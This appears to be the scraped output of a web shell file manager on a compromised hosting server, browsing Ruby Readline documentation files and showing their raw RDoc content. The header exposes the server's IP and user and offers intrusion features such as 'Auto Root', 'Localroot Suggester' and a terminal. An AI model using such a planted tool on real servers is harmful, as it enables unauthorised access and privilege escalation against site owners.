Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
Readline /
Delete
Unzip
Name
Size
Permission
Date
Action
basic_quote_characters%3d-c.ri
541
B
-rw-r--r--
2024-06-26 17:25
basic_quote_characters-c.ri
538
B
-rw-r--r--
2024-06-26 17:25
basic_word_break_characters%3d-c.ri
700
B
-rw-r--r--
2024-06-26 17:25
basic_word_break_characters-c.ri
593
B
-rw-r--r--
2024-06-26 17:25
cdesc-Readline.ri
3.72
KB
-rw-r--r--
2024-06-26 17:25
completer_quote_characters%3d-c.ri
777
B
-rw-r--r--
2024-06-26 17:25
completer_quote_characters-c.ri
573
B
-rw-r--r--
2024-06-26 17:25
completer_word_break_characters%3d-c.ri
682
B
-rw-r--r--
2024-06-26 17:25
completer_word_break_characters-c.ri
606
B
-rw-r--r--
2024-06-26 17:25
completion_append_character%3d-c.ri
1.31
KB
-rw-r--r--
2024-06-26 17:25
completion_append_character-c.ri
596
B
-rw-r--r--
2024-06-26 17:25
completion_case_fold%3d-c.ri
405
B
-rw-r--r--
2024-06-26 17:25
completion_case_fold-c.ri
751
B
-rw-r--r--
2024-06-26 17:25
completion_proc%3d-c.ri
2.7
KB
-rw-r--r--
2024-06-26 17:25
completion_proc-c.ri
373
B
-rw-r--r--
2024-06-26 17:25
completion_quote_character-c.ri
803
B
-rw-r--r--
2024-06-26 17:25
delete_text-c.ri
677
B
-rw-r--r--
2024-06-26 17:25
emacs_editing_mode%3f-c.ri
525
B
-rw-r--r--
2024-06-26 17:25
emacs_editing_mode-c.ri
590
B
-rw-r--r--
2024-06-26 17:25
filename_quote_characters%3d-c.ri
635
B
-rw-r--r--
2024-06-26 17:25
filename_quote_characters-c.ri
612
B
-rw-r--r--
2024-06-26 17:25
get_screen_size-c.ri
569
B
-rw-r--r--
2024-06-26 17:25
input%3d-c.ri
401
B
-rw-r--r--
2024-06-26 17:25
insert_text-c.ri
569
B
-rw-r--r--
2024-06-26 17:25
line_buffer-c.ri
697
B
-rw-r--r--
2024-06-26 17:25
output%3d-c.ri
407
B
-rw-r--r--
2024-06-26 17:25
point%3d-c.ri
542
B
-rw-r--r--
2024-06-26 17:25
point-c.ri
815
B
-rw-r--r--
2024-06-26 17:25
pre_input_hook%3d-c.ri
751
B
-rw-r--r--
2024-06-26 17:25
pre_input_hook-c.ri
619
B
-rw-r--r--
2024-06-26 17:25
quoting_detection_proc%3d-c.ri
1.24
KB
-rw-r--r--
2024-06-26 17:25
quoting_detection_proc-c.ri
401
B
-rw-r--r--
2024-06-26 17:25
readline-c.ri
2.81
KB
-rw-r--r--
2024-06-26 17:25
redisplay-c.ri
571
B
-rw-r--r--
2024-06-26 17:25
refresh_line-c.ri
357
B
-rw-r--r--
2024-06-26 17:25
set_screen_size-c.ri
581
B
-rw-r--r--
2024-06-26 17:25
special_prefixes%3d-c.ri
859
B
-rw-r--r--
2024-06-26 17:25
special_prefixes-c.ri
670
B
-rw-r--r--
2024-06-26 17:25
vi_editing_mode%3f-c.ri
513
B
-rw-r--r--
2024-06-26 17:25
vi_editing_mode-c.ri
549
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI" readline:ETI"Readline::readline;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GShows the +prompt+ and reads the inputted line with line editing. ;TI"EThe inputted line is added to the history if +add_hist+ is true.;To:RDoc::Markup::BlankLine o; ; [I"EReturns nil when the inputted line is empty and user inputs EOF ;TI"(Presses ^D on UNIX).;T@o; ; [I"GRaises IOError exception if one of below conditions are satisfied.;To:RDoc::Markup::List: @type:NUMBER:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"stdin was closed.;To;;0; [o; ; [I"stdout was closed.;T@o; ; [I"IThis method supports thread. Switches the thread context when waits ;TI"inputting line.;T@o; ; [I"NSupports line edit when inputs line. Provides VI and Emacs editing mode. ;TI"#Default is Emacs editing mode.;T@o; ; [I"HNOTE: Terminates ruby interpreter and does not return the terminal ;TI">status after user pressed '^C' when wait inputting line. ;TI"#Give 3 examples that avoid it.;T@o;; :BULLET;[o;;0; [o; ; [I"ACatches the Interrupt exception by pressed ^C after returns ;TI"terminal status:;T@o:RDoc::Markup::Verbatim; [I"require "readline" ;TI" ;TI"!stty_save = `stty -g`.chomp ;TI"begin ;TI"% while buf = Readline.readline ;TI" p buf ;TI" end ;TI" rescue Interrupt ;TI"% system("stty", stty_save) ;TI" exit ;TI" end ;TI" end ;TI" end ;T:@format0o;;0; [o; ; [I"ACatches the INT signal by pressed ^C after returns terminal ;TI"status:;T@o;; [ I"require "readline" ;TI" ;TI"!stty_save = `stty -g`.chomp ;TI"4trap("INT") { system "stty", stty_save; exit } ;TI" ;TI"#while buf = Readline.readline ;TI" p buf ;TI" end ;T;0o;;0; [o; ; [I"Ignores pressing ^C:;T@o;; [I"require "readline" ;TI" ;TI"trap("INT", "SIG_IGN") ;TI" ;TI"#while buf = Readline.readline ;TI" p buf ;TI" end ;T;0o; ; [I":Can make as follows with Readline::HISTORY constant. ;TI"HIt does not record to the history if the inputted line is empty or ;TI"the same it as last one.;T@o;; [I"require "readline" ;TI" ;TI"/while buf = Readline.readline("> ", true) ;TI"" # p Readline::HISTORY.to_a ;TI"/ Readline::HISTORY.pop if /^\s*$/ =~ buf ;TI" ;TI" begin ;TI"A if Readline::HISTORY[Readline::HISTORY.length-2] == buf ;TI"! Readline::HISTORY.pop ;TI" end ;TI" rescue IndexError ;TI" end ;TI" ;TI"" # p Readline::HISTORY.to_a ;TI" print "-> ", buf, "\n" ;TI"end;T;0: @fileI"ext/readline/readline.c;T:0@omit_headings_from_table_of_contents_below0I"GReadline.readline(prompt = "", add_hist = false) -> string or nil ;T0[ I"(p1 = v1, p2 = v2);T@|FI" Readline;TcRDoc::NormalModule00